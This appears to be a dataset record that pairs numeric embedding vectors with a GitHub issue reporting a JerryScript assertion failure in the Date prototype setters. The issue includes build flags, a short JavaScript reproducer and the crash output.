0.011911253444850445, -0.008755714632570744, 0.022661849856376648, -0.001012855558656156, -0.004319824278354645, -0.005748884752392769, 0.01710519939661026, 0.011352687142789364, 0.00039512247894890606, -0.003048541024327278, -0.013427363708615303, 0.01697462424635887, 0.010366127826273441, 0.008218910545110703, -0.0006932211690582335, -0.0008954295772127807, 0.0073846871964633465, -0.002051100367680192, 0.0027221059426665306, -0.01178793329745531, -0.012368262745440006, -0.010540226474404335, 0.008189893327653408, 0.029712846502661705, 0.0001339744048891589, -0.004258164204657078, 0.0022959266789257526, 0.00379390106536448, -0.016249213367700577, 0.035138923674821854, 0.004058676306158304, 0.016292737796902657, -0.0009793052449822426, 0.007206961512565613, -0.003434822428971529, 0.010525718331336975, -0.009618953801691532, -0.0071997069753706455, -0.010620021261274815, -0.0067281899973750114, 0.009597191587090492, 0.030670389533042908, 0.012143385596573353, -0.021472174674272537, 0.02100791223347187, 0.017845118418335915, -0.0035980399698019028, -0.005698105785995722, -0.0027148518711328506, 0.00017727239173837006, -0.007682105526328087, 0.004327078349888325, -0.001604972523637116, 0.0031555392779409885, -0.0013610529713332653, 0.011135063134133816, 0.007080014329403639, 0.013993184082210064, 0.0016267348546534777, -0.000010399450729892123, 0.004171114880591631, -0.03525498881936073, 0.0006107056397013366, 0.00865415669977665, 0.012085352092981339, 0.02242971770465374, -0.001818968798033893, 0.03130875155329704, -0.02773972786962986, 0.003884577425196767, 0.008102844469249249, 0.013362076133489609, 0.004526566714048386, -0.007036489434540272, -0.012353754602372646, -0.016249213367700577, -0.0014009505975991488, -0.016655443236231804, -0.016365278512239456, 0.008291451260447502, 0.014631546102464199, -0.005571158602833748, 0.0016394295962527394, 0.01122936699539423, -0.019281432032585144, -0.028073417022824287, -0.006314705591648817, -0.003710478777065873, 0.011606580577790737, -0.009227232076227665, 0.009764036163687706, -0.026724152266979218, -0.005066997837275267, -0.00249178777448833, -0.005596548318862915, -0.00492917001247406, 0.014885439537465572, 0.0033677220344543457, 0.004831239115446806, -0.00860337819904089, -0.019092826172709465, 0.003336891997605562, -0.01713421568274498, -0.0014045776333659887, -0.004094946663826704, 0.0021635391749441624, -0.010678054764866829, 0.00023462521494366229, 0.004628124181181192, -0.00754427770152688, -0.011933015659451485, -0.020209958776831627, 0.006510566454380751, 0.013681257143616676, -0.0025117367040365934, -0.00916194450110197, 0.010010676458477974, -0.014355889521539211, -0.010830391198396683, 0.002767444122582674, 0.0051613012328743935, 0.003061235649511218, -0.009510141797363758, 0.007957762107253075, 0.01582847535610199, 0.00013318097626324743, 0.02227012626826763, -0.0183383971452713, 0.004762325435876846, -0.007711122278124094, -0.013507158495485783, 0.0008360365172848105, 0.005955626722425222, -0.02521529607474804, -0.021602747961878777, -0.003124709241092205, -0.0016793272225186229, -0.00781993381679058, 0.0010527531849220395, 0.0011379889911040664, -0.018048232421278954, 0.0009366873418912292, 0.0025334989186376333, -0.00391359394416213, -0.020659713074564934, 0.005694478750228882, 0.019078318029642105, -0.007631327025592327, 0.023285703733563423, -0.001007415005005896, -0.016176672652363777, -0.017888642847537994, -0.008139114826917648, -0.031192686408758163, 0.01115682628005743, -0.0023104350548237562, -0.004279926884919405, -0.0014009505975991488, 0.01598806492984295, 0.00030943326419219375, 0.01729380525648594, -0.008052065037190914, -0.011642851866781712, -0.012854288332164288, 0.006213147658854723, 0.010257315821945667, 0.008044810965657234, -0.002410179004073143, 0.016698967665433884, -0.015567326918244362, 0.0008999633719213307, 0.007148928474634886, 0.002845425857231021, -0.015291670337319374, 0.007054625079035759, -0.023082587867975235, -0.01726478897035122, -0.027014316990971565, 0.015030521899461746, 0.01832388900220394, 0.007076387293636799, 0.002687648870050907, -0.004921915475279093, 0.009974405169487, -0.0027221059426665306, 0.00017568554903846234, -0.03322383761405945, 0.012027319520711899, -0.008081082254648209, -0.009074895642697811, -0.011011743918061256, 0.029712846502661705, -0.0073846871964633465, 0.01581396721303463, -0.020238975062966347, 0.006699173245579004, -0.0045991078950464725, 0.010148503817617893, 0.026825709268450737, -0.010649037547409534, 0.009531904943287373, 0.0072686211206018925, -0.016249213367700577, 0.0028000876773148775, 0.003583531826734543, -0.010902931913733482, 0.029828913509845734, -0.00998165924102068, -0.012658427469432354, -0.0005903034470975399, 0.0008636928396299481, 0.021530207246541977, -0.0036669541150331497, 0.022226601839065552, -0.005465974099934101, -0.020833812654018402, 0.023430785164237022, 0.022705374285578728, 0.010989981703460217, 0.006855136714875698, 0.0029524241108447313, 0.01375379879027605, -0.0016276416135951877, -0.0013229688629508018, 0.0035400071647018194, 0.006361857056617737, -0.024402836337685585, -0.00013306763139553368, -0.0019785594195127487, -0.0020093892235308886, -0.003877323353663087, 0.022763406857848167, 0.009263502433896065, 0.014355889521539211, -0.008262434974312782, 0.0006465228507295251, -0.014312365092337132, 0.00866866484284401, -0.021834880113601685, 0.0001445155357941985, -0.0007825374486856163, 0.00863239448517561, 0.01390613429248333, -0.007914237678050995, -0.0173808541148901, 0.0007213308708742261, -0.007972270250320435, -0.016220197081565857, 0.010620021261274815, -0.03325285390019417, -0.046571407467126846, 0.017598478123545647, -0.004787714686244726, 0.002702157013118267, -0.005589294247329235, -0.003229893743991852, -0.014181790873408318, 0.0045592100359499454, 0.01126563735306263, 0.0026404971722513437, 0.011925761587917805, 0.0022415209095925093, -0.0045555830001831055, -0.0017174112144857645, 0.007783663459122181, -0.01000342145562172, -0.006325586698949337, 0.02366291731595993, -0.006735444068908691, 0.0014716781442984939, -0.012876050546765327, -0.0145952757447958, 0.007696614135056734, 0.007624072954058647, -0.010815882124006748, -0.005553023423999548, 0.011621088720858097, 0.0018443582812324166, -0.00001239716584677808, -0.01578495092689991, -0.006191385444253683, -0.010605513118207455, 0.014849169179797173, 0.023097096011042595, 0.01000342145562172, -0.0034620254300534725, -0.008893542923033237, -0.011991049163043499, -0.004914661403745413, 0.006909542717039585, 0.0025171772576868534, 0.011744408868253231, -0.013035641051828861, -0.0032498426735401154, -0.016640935093164444, -0.00248272018507123, -0.007645835168659687, 0.0014662375906482339, -0.015523801557719707, -0.012622157111763954, 0.006898661609739065, 0.011563056148588657, 0.02759464643895626, 0.00046108957030810416, -0.034877777099609375, 0.004773206543177366, -0.026129314675927162, 0.00855985376983881, -0.006992965005338192, -0.0036306835245341063, -0.010591004975140095, 0.01854151301085949, 0.0006941279279999435, -0.002774698194116354, 0.00862514041364193, -0.012273958884179592, -0.012390024960041046, -0.006365484092384577, -0.011577564291656017, -0.008400263264775276, 0.028203992173075676, 0.0019803729373961687, 0.008371246047317982, -0.0031899961177259684, 0.004722427576780319, 0.01713421568274498, -0.021341601386666298, 0.014899948611855507, -0.019426515325903893, -0.009401330724358559, 0.00189513701479882, -0.016771510243415833, -0.007442719768732786, 0.009256248362362385, -0.002194369211792946, -0.023967590183019638, -0.0016865812940523028, 0.027957351878285408, 0.010025184601545334, -0.01958610489964485, 0.0005018939264118671, 0.0005993710947223008, -0.0073846871964633465, -0.0033622814808040857, 0.0011887677246704698, -0.0029052721802145243, 0.02118200995028019, -0.012266704812645912, 0.0027928336057811975, -0.0009711443562991917, 0.002558888401836157, -0.008044810965657234, 0.01594454050064087, -0.00861788634210825, -0.005440584849566221, -0.025374887511134148, 0.00247546611353755, 0.024069147184491158, 0.02756563015282154, 0.007718376349657774, 0.038911063224077225, -0.0034602119121700525, -0.013499904423952103, -0.02652103640139103, 0.03574826940894127, 0.013666749000549316, 0.004762325435876846, -0.0018008336191996932, 0.00783444195985794, -0.00010699816630221903, 0.0039027128368616104, -0.0302931759506464, -0.023430785164237022, -0.020180942490696907, -0.005962880793958902, 0.012382770888507366, -0.01736634597182274, 0.009539159014821053, -0.010591004975140095, -0.005291875451803207, 0.016249213367700577, 0.01852700486779213, 0.0009938135044649243, 0.00993088074028492, -0.0038229175843298435, -0.004457652568817139, 0.009669732302427292, -0.022154061123728752, -0.007776409387588501, 0.019455531612038612, 0.007732884492725134, 0.019499056041240692, 0.008204401470720768, -0.014203553088009357, 0.00497994851320982, 0.00758780213072896, -0.015349702909588814, -0.010104979388415813, 0.012070843949913979, 0.017656510695815086, 0.03714105859398842, 0.013224247843027115, -0.0016421498730778694, -0.016307245939970016, 0.005553023423999548, 0.015001505613327026, -0.0019350346410647035, 0.014798390679061413, -0.01970217190682888, 0.01125112920999527, 0.00046925042988732457, 0.002052913885563612, -0.022922996431589127, 0.0005150420474819839, -0.004417754709720612, 0.001517016440629959, -0.008487312123179436, 0.014986997470259666, -0.008842763490974903, -0.00760231027379632, 0.028595713898539543, -0.005175809841603041, -0.022952014580368996, -0.01865757815539837, -0.02496865764260292, -0.016162164509296417, -0.0013664935249835253, -0.00016537110786885023, -0.017453396692872047, 0.014087487943470478, 0.007138047367334366, 0.011976541019976139, -0.0036723946686834097, 0.013231501914560795, 0.020195450633764267, -0.021515699103474617, -0.03978155553340912, -0.029611289501190186, 0.02242971770465374, 0.0027239194605499506, -0.0003509177186060697, -0.0015732357278466225, -0.01505953911691904, 0.014631546102464199, 0.0008451041649095714, 0.008284197188913822, 0.005299129523336887, 0.006844255607575178, -0.010206537321209908, 0.0031537257600575686, -0.025578003376722336, -0.01727929711341858, 0.006209520623087883, -0.01460252981632948, 0.007112657651305199, 0.00783444195985794, 0.013557936996221542, 0.010141249746084213, -0.003130149794742465, -0.021733323112130165, -0.031134653836488724, -0.01862856186926365, -0.029698338359594345, 0.008922559209167957, 0.003052168060094118, -0.012244942598044872, -0.021733323112130165, 0.002337637823075056, -0.008472803980112076, -0.02240070141851902, -0.01253510732203722, 0.01828036457300186, 0.0030231515411287546, 0.005643699783831835, -0.0033695355523377657, -0.008001286536455154, 0.016771510243415833, -0.00033867641468532383, 0.024446360766887665, 0.022125044837594032, -0.012789001688361168, -0.01603158935904503, -0.021950945258140564, 0.020848320797085762, 0.008356737904250622, -0.014341381378471851, -0.0005848628934472799, 0.00024278608907479793, -0.019005775451660156, 0.014051216654479504, 0.008015794679522514, -0.02242971770465374, 0.008052065037190914, -0.009553667157888412, -0.008850017562508583, -0.0343264639377594, 0.0173808541148901, 0.007127166260033846, 0.02370644174516201, 0.010503956116735935, -0.040042705833911896, 0.01851249672472477, 0.006637513637542725, 0.01119309663772583, -0.01597355678677559, -0.033543020486831665, 0.025897184386849403, -0.004867509938776493, 0.008480058051645756, -0.016423311084508896, -0.016481345519423485, -0.046571407467126846, 0.003146471455693245, -0.011584818363189697, -0.004265418276190758, -0.008255180902779102, 0.013354822061955929, 0.01703265681862831, 0.01046043075621128, -0.008110098540782928, -0.014450193382799625, -0.01993430219590664, -0.024315787479281425, 0.0007739231805317104, 0.006641140673309565, -0.003503736574202776, 0.024199720472097397, -0.005542142316699028, 0.0198762696236372, -0.006365484092384577, -0.01842544786632061, 0.027478579431772232, 0.01376105286180973, -0.007235977798700333, -0.01249883696436882, -0.011425227858126163, -0.01601708121597767, 0.018947742879390717, 0.01505953911691904, -0.005741630680859089, -0.02356135845184326, 0.0015877439873293042, 0.013623224571347237, 0.022981030866503716, -0.005513126030564308, -0.008980591781437397, -0.007986778393387794, 0.016553886234760284, -0.003637937596067786, 0.0015795831568539143, -0.03052530810236931, 0.018178807571530342, 0.016292737796902657, -0.014798390679061413, -0.008951575495302677, 0.009531904943287373, 0.013166215270757675, -0.029422681778669357, -0.006807985249906778, -0.0019731188658624887, 0.026172839105129242, -0.009473871439695358, -0.008298705331981182, 0.021994471549987793, 0.009423092938959599, 0.007348416373133659, 0.010271823965013027, 0.01732282154262066, -0.004254537168890238, 0.0029433562885969877, 0.012390024960041046, 0.01864307001233101, 0.011933015659451485, 0.005259232129901648, 0.006517820525914431, -0.01591552421450615, -0.016873067244887352, 0.009488379582762718, -0.006035421974956989, 0.00623128330335021, 0.022212093695998192, 0.010380635969340801, 0.013971421867609024, 0.0015777696389704943, -0.014370397664606571, 0.0038337986916303635, 0.0032969943713396788, 0.007203334476798773, 0.010489447042346, 0.024678492918610573, 0.008182639256119728, 0.010395144112408161, -0.0010400584433227777, 0.008305959403514862, 0.012738222256302834, 0.0021671662107110023, 0.00047559780068695545, 0.009647970087826252, -0.011519531719386578, -0.000873667246196419, -0.005346281453967094, -0.015262654051184654, 0.00393172912299633, 0.010685308836400509, -0.020238975062966347, 0.006427144166082144, -0.01458076760172844, -0.000003035534518858185, -0.0012513345573097467, -0.03255645930767059, -0.01696011610329151, 0.024040130898356438, 0.007362924981862307, -0.00188788294326514, -0.015016013756394386, -0.01387711800634861, 0.030003011226654053, 0.00758780213072896, -0.021878404542803764, -0.019034791737794876, -0.021660782396793365, 0.003064862685278058, -0.013158961199223995, 0.0014508225722238421, 0.005458720028400421, -0.006739071104675531, -0.008509074337780476, -0.01251334510743618, -0.022995539009571075, -0.001958610489964485, 0.012970354408025742, 0.016844050958752632, -0.003338705515488982, 0.03438449651002884, -0.0022941131610423326, 0.008538090623915195, 0.022908488288521767, 0.0016466836677864194, 0.020369550213217735, -0.011461498215794563, -0.0051467930898070335, -0.03719909116625786, -0.0015632613794878125, -0.009633461944758892, -0.013042895123362541, -0.013608716428279877, 0.008886288851499557, -0.007119912188500166, -0.015509293414652348, 0.01568339206278324, -0.0019060182385146618, 0.014544496312737465, -0.012919574975967407, 0.0010337111307308078, -0.003509177127853036, 0.006412636023014784, 0.01390613429248333, 0.022067012265324593, -0.006615750957280397, -0.0011262010084465146, -0.001240453333593905, 0.006876899395138025, -0.005527634173631668, 0.020819304510951042, 0.002852679928764701, -0.006818866357207298, 0.0013275026576593518, 0.00630382401868701, -0.020442090928554535, -0.013913389295339584, 0.005854069255292416, -0.004178368952125311, -0.015219129621982574, 0.023169636726379395, 0.008291451260447502, -0.035167939960956573, -0.00758780213072896, -0.021762339398264885, 0.026840217411518097, -0.010569242760539055, -0.008850017562508583, -0.005172182805836201, 0.005679970607161522, 0.0005499524413608015, -0.029770879074931145, -0.0066012428142130375, 0.0037249871529638767, 0.01122936699539423, -0.0008528116741217673, -0.004838493186980486, 0.008451041765511036, 0.020021352916955948, 0.015552818775177002, -0.031047603115439415, -0.010148503817617893, 0.023459801450371742, 0.012056335806846619, -0.020224466919898987, -0.006024540867656469, -0.01046768482774496, -0.0003352760395500809, 0.008422025479376316, 0.0078489501029253, 0.028610222041606903, 0.001599531969986856, -0.008509074337780476, -0.024228736758232117, -0.009807560592889786, 0.010794119909405708, 0.021602747961878777, 0.012005557306110859, 0.00041008408879861236, 0.02121102623641491, -0.0023757219314575195, -0.0036959706339985132, -0.010823137126863003, 0.004236401990056038, 0.017787085846066475, 0.010503956116735935, 0.0037612575106322765, 0.04384385794401169, -0.00860337819904089, 0.035051874816417694, -0.0013692138018086553, 0.001965864561498165, -0.006637513637542725, 0.01510306354612112, -0.001827129744924605, 0.0052737402729690075, 0.0010826763464137912, -0.0017319194739684463, 0.00985834002494812, 0.010250061750411987, 0.011069776490330696, 0.005524007137864828, 0.0072976378723979, -0.007638581097126007, -0.005092387553304434, -0.0036125483456999063, -0.002178047550842166, 0.012215926311910152, -0.008458295837044716, -0.01254961546510458, 0.0013610529713332653, -0.005259232129901648, -0.0003139670880045742, 0.019382990896701813, -0.028653746470808983, -0.001391882891766727, -0.006162369158118963, -0.008059320040047169, 0.02240070141851902, -0.018831677734851837, 0.03348498418927193, 0.004508431069552898, 0.00028087018290534616, -0.010039692744612694, -0.0006991151603870094, 0.0028037147130817175, 0.01258588582277298, -0.0022397073917090893, 0.0030938792042434216, -0.006365484092384577, 0.022052504122257233, 0.011766171082854271, 0.004105827771127224, 0.003712292294949293, -0.025447428226470947, 0.0007217842503450811, 0.006020913831889629, -0.0009675173205323517, 0.024591444060206413, -0.02502669021487236, 0.012926829047501087, -0.008755714632570744, -0.004733308684080839, -0.007054625079035759, 0.012658427469432354, -0.015422244556248188, -0.016278229653835297, -0.005854069255292416, -0.0036179888993501663, -0.0151465879753232, 0.00391722097992897, 0.0078489501029253, -0.0003574917500372976, -0.021501190960407257, -0.00009056306589627638, 0.007994032464921474, -0.008247926831245422, 0.01852700486779213, -0.0027402411215007305, 0.0044902958907186985, 0.005505871959030628, 0.013674003072082996, -0.01713421568274498, 0.00857436191290617, 0.020369550213217735, 0.01578495092689991, 0.02504119835793972, -0.002751122461631894, 0.006575853563845158, -0.019470039755105972, 0.008356737904250622, -0.019557088613510132, -0.01379732321947813, -0.004341586492955685, 0.011954777874052525, 0.0066084968857467175, 0.009706003591418266, -0.0009394076187163591, -0.02498316578567028, 0.002569769509136677, 0.008879034779965878, -0.015610851347446442, 0.00041008408879861236, 0.021588239818811417, 0.0013021132908761501, -0.009350551292300224, -0.008451041765511036, 0.028566697612404823, 0.012897812761366367, -0.0025824641343206167, 0.010337111540138721, -0.006749952211976051, 0.047877147793769836, 0.02248775027692318, -0.010591004975140095, 0.012012811377644539, 0.003402179107069969, 0.010170266963541508, -0.010148503817617893, -0.008197147399187088, -0.00029492503381334245, -0.023503325879573822, -0.009386822581291199, -0.009756782092154026, -0.017583969980478287, -0.041522543877363205, 0.0004159780510235578, 0.002312248572707176, -0.027086857706308365, -0.006350975949317217, 0.011381703428924084, -0.004566464107483625, -0.008966083638370037, 0.013964167796075344, 0.014928964897990227, 0.02103692851960659, 0.024417344480752945, -0.0005032540648244321, 0.024852590635418892, 0.0034765335731208324, 0.013246010057628155, -0.005103268660604954, 0.0026042265817523003, 0.012716460041701794, -0.010155757889151573, 0.018120774999260902, 0.007754646707326174, -0.01976020447909832, -0.008168131113052368, 0.0018035538960248232, -0.01846897229552269, -0.0198762696236372, -0.005469601135700941, 0.026796692982316017, 0.03661876171827316, -0.0033786031417548656, 0.014210807159543037, -0.0028109687846153975, 0.008320467546582222, 0.04454025253653526, 0.00728312972933054, -0.01122211292386055, -0.023155128583312035, 0.014218061231076717, -0.00021773674234282225, -0.0017754441360011697, 0.00728675676509738, 0.05385453626513481, 0.014762120321393013, 0.006884153466671705, 0.0071960799396038055, -0.008124606683850288, -0.007181571796536446, -0.008168131113052368, 0.00914743635803461, 0.00869042705744505, 0.0059846434742212296, 0.0034765335731208324, -0.005527634173631668, 0.004664394538849592, 0.007101776544004679, -0.017990199849009514, -0.002415619557723403, -0.01130190771073103, -0.005796036217361689, -0.023126112297177315, -0.007965016178786755, -0.013216993771493435, -0.0007385594071820378, 0.013333059847354889, 0.002132709138095379, -0.006358230020850897, 0.022618325427174568, 0.024127179756760597, 0.0030975062400102615, 0.008908051066100597, -0.02753661386668682, 0.02228463441133499, -0.004149352665990591, 0.026956284418702126, -0.021718814969062805, 0.019470039755105972, 0.013035641051828861, -0.01571240834891796, 0.010815882124006748, 0.01964413747191429, -0.014624292030930519, 0.011867729015648365, -0.009009608067572117, -0.0033749761059880257, -0.017438888549804688, -0.009292518720030785, 0.005774274002760649, -0.016249213367700577, -0.018193315714597702, 0.008168131113052368, 0.020050369203090668, 0.00248816073872149, 0.012020065449178219, -0.0016312686493620276, 0.004261791240423918, -0.010540226474404335, 0.014326873235404491, 0.0028925775550305843, -0.003706851741299033, -0.0059918975457549095, 0.03264350816607475, -0.01976020447909832, -0.019557088613510132, -0.00034003655309788883, 0.00006188665429363027, -0.022081520408391953, 0.023358244448900223, 0.004254537168890238, 0.01563986763358116, 0.009219978004693985, 0.01849798858165741, 0.007994032464921474, 0.018744628876447678, -0.006855136714875698, 0.004145725630223751, -0.008944321423768997, -0.014065724797546864, 0.022154061123728752, 0.018962251022458076, -0.0072976378723979, -0.0024319414515048265, 0.01828036457300186, 0.007119912188500166, 0.004073184449225664, -0.01704716496169567, 0.0013646800071001053, -0.006387246772646904, -0.006967575754970312, -0.009742273949086666, -0.019571596756577492, 0.011033506132662296, 0.016191180795431137, 0.03656072914600372, -0.008842763490974903, 0.00755153177306056, 0.0124698206782341, -0.00001882952346932143, -0.008015794679522514, -0.012375516816973686, 0.00037404021713882685, -0.019281432032585144, 0.008153622969985008, 0.0017337329918518662, -0.03429744765162468, 0.021486682817339897, -0.015407736413180828, 0.0006501498864963651, -0.0032589102629572153, -0.0023775354493409395, -0.0010436854790896177, 0.017627494409680367, 0.012701951898634434, 0.013021132908761501, 0.00755878584459424, -0.00380115513689816, 0.006361857056617737, -0.0002473199274390936, -0.022110536694526672, 0.008733952417969704, 0.007515260949730873, 0.006314705591648817, -0.0015523801557719707, -0.007359297480434179, 0.042857300490140915, 0.0004293528036214411, 0.003355027176439762, -0.0021599121391773224, 0.001167005393654108, 0.011534039862453938, -0.0019023912027478218, 0.006307451520115137, -0.0027094113174825907, -0.01117858849465847, 0.015349702909588814, 0.02115299366414547, 0.002181674586609006, 0.0225167665630579, 0.008044810965657234, 0.03804056718945503, 0.0124698206782341, -0.00869768112897873, -0.013238755986094475, 0.03940434381365776, -0.006350975949317217, -0.010148503817617893, -0.023314720019698143, 0.024867098778486252, -0.008509074337780476, -0.00010648811439750716, -0.008284197188913822, -0.01178793329745531, 0.021907420828938484, 0.0171632319688797, 0.026637103408575058, -0.014841915108263493, -0.016307245939970016, 0.01582847535610199, -0.01736634597182274, 0.005741630680859089, -0.010148503817617893, 0.005632818676531315, -0.012723714113235474, -0.012687443755567074, -0.008110098540782928, -0.0004928262787871063, 0.008951575495302677, 0.002776511711999774, -0.004921915475279093, 0.010017930530011654, 0.007500752806663513, -0.0009929067455232143, 0.0031899961177259684, 0.002029338153079152, -0.018120774999260902, 0.0005880365497432649, -0.0023485191632062197, 0.006858763750642538, 0.004352467600256205, -0.02502669021487236, -0.0028762558940798044, 0.0014943472342565656, -0.008255180902779102, 0.01260039396584034, -0.01505953911691904, 0.01710519939661026, -0.00005449085801956244, -0.004272672813385725, -0.015291670337319374, -0.014348635450005531, 0.004055049270391464, -0.005378924775868654, -0.0036923435982316732, 0.016553886234760284, -0.007515260949730873, 0.014167282730340958, -0.00754427770152688, 0.020978894084692, -0.024170704185962677, 0.01253510732203722, 0.02232816070318222, -0.010395144112408161, -0.00988010223954916, 0.00729401083663106, 0.008276943117380142, 0.0066084968857467175 ]
3,009
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 3bcd48f ###### Build platform Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` var d = new Date(13, 14); d.setDate("0"); d.setUTCDate(2000); print("getMilliseconds : " + d.getMilliseconds()); d.setTime(100); print("getTime : " + d.getTime()); d.setMilliseconds(10); ``` ###### Output ``` getMilliseconds : 0 getTime : 100 ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421. ```
Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed in ecma_builtin_date_prototype_dispatch_set
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4749/comments
0
2021-08-24T03:41:12
2021-10-01T10:59:39Z
https://github.com/jerryscript-project/jerryscript/issues/4749
977,670,147
4,749
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed in ecma_builtin_date_prototype_dispatch_set Issue date: --- start body --- ###### JerryScript revision 3bcd48f ###### Build platform Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` var d = new Date(13, 14); d.setDate("0"); d.setUTCDate(2000); print("getMilliseconds : " + d.getMilliseconds()); d.setTime(100); print("getTime : " + d.getTime()); d.setMilliseconds(10); ``` ###### Output ``` getMilliseconds : 0 getTime : 100 ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421. ``` --- end body ---
1,231
[ 0.024407124146819115, -0.015015274286270142, -0.005616121459752321, 0.016432086005806923, 0.001253402908332646, -0.0049223224632442, -0.00288656959310174, 0.047996293753385544, -0.03499668836593628, 0.002101481193676591, 0.004414753522723913, 0.00251958635635674, -0.005871731787919998, -0.002130693756043911, 0.011816495098173618, 0.029460903257131577, -0.025064406916499138, 0.004480482079088688, -0.02475767582654953, -0.011787282302975655, -0.017673620954155922, 0.03861905261874199, -0.022888069972395897, 0.044081807136535645, -0.006598395295441151, 0.0029541237745434046, 0.00721916276961565, 0.011356396600604057, 0.012670964002609253, -0.020258935168385506, -0.011327183805406094, 0.005864428821951151, -0.01697251759469509, 0.002254847204312682, 0.023486927151679993, 0.0066166529431939125, 0.03496747836470604, 0.04934007674455643, 0.01299230195581913, -0.016841061413288116, -0.05413094162940979, -0.019996022805571556, -0.018608422949910164, 0.04180322587490082, -0.00008061991684371606, 0.05220291018486023, 0.02623291127383709, 0.00461558997631073, -0.013561948202550411, 0.014445628970861435, 0.0034105705562978983, 0.0008590329089201987, 0.027328383177518845, -0.01670960523188114, 0.03666180744767189, -0.014949546195566654, 0.03914487734436989, 0.00704388739541173, 0.010815964080393314, -0.004078808706253767, 0.028102517127990723, 0.00019558746134862304, -0.005072037223726511, 0.01152436900883913, 0.03429558873176575, 0.07390786707401276, -0.011677735485136509, 0.0150590930134058, 0.017600588500499725, -0.015716377645730972, -0.007661003153771162, -0.005148719996213913, 0.04270881414413452, 0.04025495797395706, 0.026174485683441162, -0.04203692451119423, -0.008917145431041718, 0.03759660944342613, -0.03374055027961731, -0.047733381390571594, 0.006455983966588974, -0.007514940574765205, -0.028044091537594795, -0.003845107974484563, 0.014511357061564922, -0.01188952662050724, -0.0012406224850565195, -0.07566062361001968, 0.004535255488008261, 0.004403798840939999, -0.007255678530782461, 0.005459103733301163, -0.04969062656164169, 0.0023899555671960115, -0.02334086410701275, 0.023647597059607506, -0.005422587972134352, 0.019703896716237068, -0.05988582223653793, -0.0022073767613619566, 0.012459171935915947, 0.011232242919504642, 0.0067627159878611565, -0.018900549039244652, 0.014927636831998825, 0.012546810321509838, 0.03005976229906082, -0.02449476160109043, 0.055942121893167496, 0.10446424037218094, -0.00401673186570406, -0.00874186959117651, -0.023706022650003433, -0.026130666956305504, -0.04124818742275238, 0.028730588033795357, 0.0038487594574689865, -0.0075733656994998455, 0.02816094271838665, 0.01866684854030609, -0.03543487936258316, 0.006529015023261309, 0.021222950890660286, -0.009873857721686363, -0.008004250936210155, 0.019324133172631264, 0.03005976229906082, -0.0011100786505267024, 0.021456651389598846, -0.03610676899552345, -0.05179393291473389, 0.010165983811020851, 0.004681318532675505, -0.026057636365294456, 0.03233834356069565, 0.013094546273350716, -0.016578149050474167, 0.037771888077259064, -0.022756611928343773, -0.04057629778981209, -0.03134511411190033, -0.007314103655517101, 0.04925243556499481, 0.00888062920421362, -0.012787814252078533, -0.01919267512857914, -0.019981415942311287, 0.024713857099413872, -0.0010096603073179722, -0.015979290008544922, -0.018579211086034775, -0.02183641493320465, 0.0069306883960962296, 0.0037501670885831118, 0.044782910495996475, -0.012305806390941143, -0.0038049407303333282, 0.01819944754242897, -0.020346572622656822, -0.01554110087454319, -0.017571376636624336, -0.03184172883629799, 0.009508700110018253, -0.022040903568267822, -0.029665391892194748, 0.02205551043152809, -0.035113539546728134, 0.0335068479180336, 0.026787951588630676, 0.0196892898529768, -0.021033069118857384, -0.014416416175663471, 0.010728325694799423, 0.024202635511755943, -0.003646097145974636, 0.0037903343327343464, 0.008325589820742607, 0.012364231050014496, 0.017848895862698555, -0.013744526542723179, -0.010531140491366386, 0.031199052929878235, -0.013744526542723179, 0.016680391505360603, 0.027766572311520576, -0.03785952553153038, 0.0007271197973750532, -0.04782101884484291, -0.006744458340108395, -0.05532865598797798, 0.005364162847399712, -0.008369408547878265, 0.005115855950862169, -0.010494625195860863, -0.014839998446404934, 0.027562083676457405, 0.0067992317490279675, -0.04110212251543999, -0.014445628970861435, -0.009618246927857399, 0.04025495797395706, -0.009282302111387253, -0.053517475724220276, -0.03818086162209511, -0.018097203224897385, -0.0344124399125576, -0.003069148398935795, 0.024465549737215042, 0.0432930663228035, -0.004900413099676371, 0.0024356001522392035, -0.02109149470925331, 0.022742006927728653, -0.03105298988521099, -0.002388129709288478, 0.008164920844137669, 0.02306334488093853, 0.019791534170508385, -0.03128669038414955, -0.010129467584192753, -0.0003825024177785963, -0.02209932915866375, -0.041394248604774475, -0.015102912671864033, -0.04907716065645218, -0.008186830207705498, 0.00874917209148407, 0.014810786582529545, -0.019747715443372726, 0.007661003153771162, -0.012634447775781155, -0.04124818742275238, -0.004005777183920145, 0.005371466279029846, 0.03344842419028282, 0.0032900685910135508, -0.016826454550027847, -0.016621967777609825, 0.003815895412117243, -0.004630196373909712, -0.008157617412507534, -0.011414822190999985, -0.03406188637018204, -0.04755810648202896, -0.00851547159254551, -0.027591297402977943, 0.0024410774931311607, 0.012926573865115643, 0.007208208087831736, 0.011115392670035362, -0.018739880993962288, -0.0023242272436618805, -0.033623699098825455, -0.011677735485136509, 0.015628738328814507, -0.011699644848704338, -0.01673881709575653, 0.023180194199085236, 0.00656553078442812, -0.00803346373140812, 0.02303413115441799, 0.02160271443426609, -0.04446157068014145, 0.027299171313643456, 0.03178330510854721, 0.027839604765176773, -0.05071306601166725, 0.019484801217913628, -0.03131590411067009, 